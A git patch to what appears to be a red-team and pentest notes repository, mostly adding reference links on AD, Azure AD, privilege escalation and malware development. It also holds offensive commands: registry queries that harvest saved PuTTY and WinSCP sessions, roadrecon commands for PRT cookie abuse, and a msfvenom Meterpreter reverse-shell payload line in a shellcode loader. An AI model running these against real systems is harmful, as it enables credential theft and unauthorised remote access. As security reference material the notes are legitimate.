From 301e26296f8c4347146183dabfe597ba02d8e5e4 Mon Sep 17 00:00:00 2001 From: Sam Freeside Date: Sat, 28 Sep 2024 02:02:51 +0300 Subject: [PATCH] [AHK] Automatic update :alien: --- admin/linux/README.md | 10 ++++++++++ pentest/infrastructure/ad/ad-cs-abuse/esc8.md | 3 ++- pentest/infrastructure/ad/av-edr-evasion/README.md | 1 + .../dotnet-assembly/dotnet-in-memory-assembly.md | 1 + .../ad/credential-harvesting/from-memory/lsass.md | 7 +++++++ .../ad/credential-harvesting/ssh-clients.md | 8 +++++--- pentest/infrastructure/ad/sccm-abuse.md | 2 ++ pentest/infrastructure/azure-ad/README.md | 7 ++++--- pentest/infrastructure/azure-ad/prt-abuse.md | 6 ++++++ pentest/infrastructure/lpe.md | 1 + redteam/maldev/README.md | 6 ++++-- redteam/maldev/code-injection/README.md | 3 --- 12 files changed, 43 insertions(+), 12 deletions(-) diff --git a/admin/linux/README.md b/admin/linux/README.md index ad4d6f8..b6bf08f 100644 --- a/admin/linux/README.md +++ b/admin/linux/README.md @@ -79,6 +79,16 @@ $ dig +time=1 +tcp +tries=1 +short txt ch whoami.cloudflare @1.0.0.1 | tr -d '\" +### Internel Speed + +``` +$ curl https://speedtest.selectel.ru/100MB -o/dev/null +$ curl --connect-to ::speedtest.selectel.ru https://manifest.googlevideo.com/100MB -k -o/dev/null +$ speedtest-cli +``` + + + ## Virtual Terminal diff --git a/pentest/infrastructure/ad/ad-cs-abuse/esc8.md b/pentest/infrastructure/ad/ad-cs-abuse/esc8.md index eb9207e..99723ab 100644 --- a/pentest/infrastructure/ad/ad-cs-abuse/esc8.md +++ b/pentest/infrastructure/ad/ad-cs-abuse/esc8.md @@ -5,8 +5,9 @@ description: NTLM Relay to AD CS HTTP Endpoints # ESC8 * [https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/](https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/) -* [https://habr.com/ru/company/deiteriylab/blog/581758/](https://habr.com/ru/company/deiteriylab/blog/581758/) * [https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) +* [https://habr.com/ru/company/deiteriylab/blog/581758/](https://habr.com/ru/company/deiteriylab/blog/581758/) +* [https://habr.com/ru/companies/jetinfosystems/articles/846066/](https://habr.com/ru/companies/jetinfosystems/articles/846066/) diff --git a/pentest/infrastructure/ad/av-edr-evasion/README.md b/pentest/infrastructure/ad/av-edr-evasion/README.md index 32787c7..2acf62b 100644 --- a/pentest/infrastructure/ad/av-edr-evasion/README.md +++ b/pentest/infrastructure/ad/av-edr-evasion/README.md @@ -177,6 +177,7 @@ Note that we don't have to target the exact .NET Framework version when compilin - [https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec](https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec) - [https://github.com/icyguider/Shhhloader](https://github.com/icyguider/Shhhloader) - [https://hub.docker.com/repository/docker/snovvcrash/ollvm13](https://hub.docker.com/repository/docker/snovvcrash/ollvm13) +- [https://github.com/jonpalmisc/limoncello](https://github.com/jonpalmisc/limoncello) Install LLVM 13.x obfuscator based on [heroims/obfuscator](https://github.com/heroims/obfuscator) and [tpoechtrager/wclang](https://github.com/tpoechtrager/wclang): diff --git a/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md b/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md index ed2a54c..cba9347 100644 --- a/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md +++ b/pentest/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md @@ -29,6 +29,7 @@ - [https://github.com/med0x2e/ExecuteAssembly](https://github.com/med0x2e/ExecuteAssembly) - [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly) - [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly) +- [https://github.com/VoldeSec/PatchlessCLRLoader](https://github.com/VoldeSec/PatchlessCLRLoader) diff --git a/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md b/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md index e8e7d4f..68abacb 100644 --- a/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md +++ b/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md @@ -219,6 +219,13 @@ PS > Invoke-Mimikatz -Command '"!processprotect /process:lsass.exe /remove" "exi +### SspirConnectRpc + +- [https://itm4n.github.io/ghost-in-the-ppl-part-2/](https://itm4n.github.io/ghost-in-the-ppl-part-2/) +- [https://github.com/itm4n/Pentest-Windows/blob/main/NdrServerCallAll/DuplicateHandle.cpp](https://github.com/itm4n/Pentest-Windows/blob/main/NdrServerCallAll/DuplicateHandle.cpp) + + + ### MirrorDump - [https://github.com/CCob/MirrorDump](https://github.com/CCob/MirrorDump) diff --git a/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md b/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md index 1c6b447..b11f7b1 100644 --- a/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md +++ b/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md @@ -12,7 +12,8 @@ ``` Cmd > reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s Cmd > reg query "HKEY_USERS\\Software\SimonTatham\PuTTY\Sessions" /s -PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions\" -Recurse +PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions" -Recurse +PS > Get-ChildItem -Path "Registry::HKEY_USERS\\Software\SimonTatham\PuTTY\Sessions" -Recurse ``` @@ -26,11 +27,12 @@ PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions\" -Recurse - [https://winscp.net/eng/docs/faq_password](https://winscp.net/eng/docs/faq_password) - [https://github.com/anoopengineer/winscppasswd](https://github.com/anoopengineer/winscppasswd) -- [https://snovvcrash.rocks/2021/08/07/htb-rpg.html#5-wake-from-death-and-turn-to-life](https://snovvcrash.rocks/2021/08/07/htb-rpg.html#5-wake-from-death-and-turn-to-life) +- [https://snovvcrash.rocks/2021/08/07/htb-rpg.html](https://snovvcrash.rocks/2021/08/07/htb-rpg.html#5-wake-from-death-and-turn-to-life) ``` Cmd > reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s Cmd > reg query "HKEY_USERS\\Software\Martin Prikryl\WinSCP 2\Sessions" /s Cmd > for /f "tokens=*" %a in ('reg query "HKEY_USERS" ^| findstr /r "S-1-5-.*"') do @reg query "%a\Software\Martin Prikryl\WinSCP 2\Sessions" /s -PS > Get-ChildItem -Path "HKCU:\Software\Martin Prikryl\WinSCP 2\Sessions\" -Recurse +PS > Get-ChildItem -Path "HKCU:\Software\Martin Prikryl\WinSCP 2\Sessions" -Recurse +PS > Get-ChildItem -Path "Registry::HKEY_USERS\\Software\Martin Prikryl\WinSCP 2\Sessions" -Recurse ``` diff --git a/pentest/infrastructure/ad/sccm-abuse.md b/pentest/infrastructure/ad/sccm-abuse.md index 38b58f0..aa8c413 100644 --- a/pentest/infrastructure/ad/sccm-abuse.md +++ b/pentest/infrastructure/ad/sccm-abuse.md @@ -10,6 +10,8 @@ description: System Center Configuration Manager / Microsoft Endpoint Configurat - [https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/](https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/) - [https://http418infosec.com/offensive-sccm-summary](https://http418infosec.com/offensive-sccm-summary) +{% embed url="https://github.com/subat0mik/Misconfiguration-Manager/blob/main/README.md#sccm-attack-matrix" caption="Misconfiguration Manager / SCCM Attack Matrix" %} + diff --git a/pentest/infrastructure/azure-ad/README.md b/pentest/infrastructure/azure-ad/README.md index 3493e99..b9ad866 100644 --- a/pentest/infrastructure/azure-ad/README.md +++ b/pentest/infrastructure/azure-ad/README.md @@ -49,11 +49,12 @@ $ o365spray --spray -d megacorp.cloud -U names.txt -p 'Passw0rd!' --sleep 5 --ra - [https://github.com/dirkjanm/ROADtools](https://github.com/dirkjanm/ROADtools?tab=readme-ov-file#using-roadrecon) ``` -$ roadrecon auth --device-code -$ roadrecon gather -$ roadrecon gui +$ roadrecon auth --device-code [-ua ''] +$ roadrecon gather [-d megacorp.db] [-ua ''] +$ roadrecon gui [-d megacorp.db] ``` + #### AzureHound - [https://github.com/BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound/releases/latest) diff --git a/pentest/infrastructure/azure-ad/prt-abuse.md b/pentest/infrastructure/azure-ad/prt-abuse.md index 18f82ce..84b3e58 100644 --- a/pentest/infrastructure/azure-ad/prt-abuse.md +++ b/pentest/infrastructure/azure-ad/prt-abuse.md @@ -7,6 +7,12 @@ description: Primary Refresh Tokens - [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) - [https://aadinternals.com/post/prt/](https://aadinternals.com/post/prt/) +``` +$ roadrecon auth --prt-init +Cmd > ROADToken.exe +$ [proxychains] roadrecon auth [-d megacorp.db] --prt-cookie [-ua ''] +``` + diff --git a/pentest/infrastructure/lpe.md b/pentest/infrastructure/lpe.md index ae8ce87..4ece74e 100644 --- a/pentest/infrastructure/lpe.md +++ b/pentest/infrastructure/lpe.md @@ -698,6 +698,7 @@ done ### Old Ubuntu Quick Deploy (Cheatsheet) - [http://old-releases.ubuntu.com/releases/](http://old-releases.ubuntu.com/releases/) +- [https://hummelchen.gitbook.io/linux_lpe](https://hummelchen.gitbook.io/linux_lpe) ``` $ sudo sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list diff --git a/redteam/maldev/README.md b/redteam/maldev/README.md index 3c40883..ad1c2fc 100644 --- a/redteam/maldev/README.md +++ b/redteam/maldev/README.md @@ -5,6 +5,8 @@ - [https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/](https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/) - [https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/](https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/) +{% embed url="https://gist.github.com/0prrr/c0954a638c55ab4b39e8b02ef312e806" caption="Malware Dev Reading List, 0prrr/All-Mal-Dev.md" %} + [EIKAR](https://ru.wikipedia.org/wiki/EICAR-Test-File) test file: ``` @@ -16,16 +18,16 @@ $ msfvenom -p windows/messagebox TITLE="EICAR" TEXT="X5O!P%@AP[4\PZX54(P^)7CC)7} ## Blog Series / Books -- [https://cocomelonc.github.io/](https://cocomelonc.github.io/) - ### PE Structure +- [https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/](https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/#the-common-ground) - [https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/](https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/) - [https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html](https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html) - [https://print3m.github.io/blog/x64-winapi-shellcoding](https://print3m.github.io/blog/x64-winapi-shellcoding) - [https://habr.com/ru/articles/808787/](https://habr.com/ru/articles/808787/) +- [https://nikhilh-20.github.io/blog/peb_phobos_ransomware/](https://nikhilh-20.github.io/blog/peb_phobos_ransomware/) ![PE File Structure (by @Print3M)](https://print3m.github.io/imgs/x64-shellcoding-winapi/pe-structure.png) diff --git a/redteam/maldev/code-injection/README.md b/redteam/maldev/code-injection/README.md index e6742d8..50ba006 100644 --- a/redteam/maldev/code-injection/README.md +++ b/redteam/maldev/code-injection/README.md @@ -21,12 +21,9 @@ {% tab title="Windows" %} {% code title="loader.c" %} ```c -#include #include - // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw -o met.bin --encrypt xor --encrypt-key a // xxd -i met.bin > shellcode.h -#include #include "shellcode.h" int main() {